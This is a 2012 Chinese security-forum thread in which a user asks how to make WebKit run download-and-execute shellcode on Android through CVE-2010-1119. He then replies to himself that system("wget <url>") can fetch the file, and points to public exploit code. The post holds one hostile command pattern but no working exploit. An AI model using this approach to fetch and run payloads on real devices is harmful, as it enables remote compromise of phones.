[求助]安卓下的download&exec-Android安全-看雪-安全社区|安全招聘|kanxue.com

[求助]安卓下的download&exec

发表于: 2012-2-17 21:47 7647

[求助]安卓下的download&exec

pdx

2012-2-17 21:47

7647

我想利用漏洞cve-2010-1119让webkit跑一段下载执行文件的shellcode
这里：568K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4Z5k6h3I4D9i4K6u0V1M7%4c8G2M7X3#2Q4x3X3g2G2M7X3N6Q4x3V1k6K6K9r3g2D9L8r3y4G2k6r3g2Q4x3V1k6K6K9r3g2D9L8r3y4G2k6r3g2Q4x3X3c8D9K9h3&6#2P5q4)9J5k6i4m8Z5M7l9`.`.
在Linux\ARM下有一些执行命令与bind端口的shellcode实例
看了以后好象有了一些概念
但是下载url指向的文件该使用什么函数呢？难道只能用socket做个客户端，然后用recv接受某特定IP传过来的数据，再开个文件写进去吗？
谢谢~

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・0

免费・0

支持

最新回复 (1)
pdx 雪币： 238 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 96 粉丝 0 关注私信	pdx 2 楼经人指导，知道了可以用命令行执行system("wget 6b7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5k6g2)9J5k6g2)9J5k6b7`.`.")，socket的话可能更加灵活。。这个漏洞在exploit-db上有利用的代码和分析：e79K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0j5&6y4K6c8Q4x3V1j5`. 貌似只要把shell里的东西改掉就行了。 2012-2-18 17:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (1)

pdx

雪币： 238

活跃值： (11)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

pdx: 2 楼

经人指导，知道了可以用命令行执行system("wget 6b7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5k6g2)9J5k6g2)9J5k6b7`.`.")，socket的话可能更加灵活。。
这个漏洞在exploit-db上有利用的代码和分析：e79K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0j5&6y4K6c8Q4x3V1j5`.
貌似只要把shell里的东西改掉就行了。

2012-2-18 17:18

pdx

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区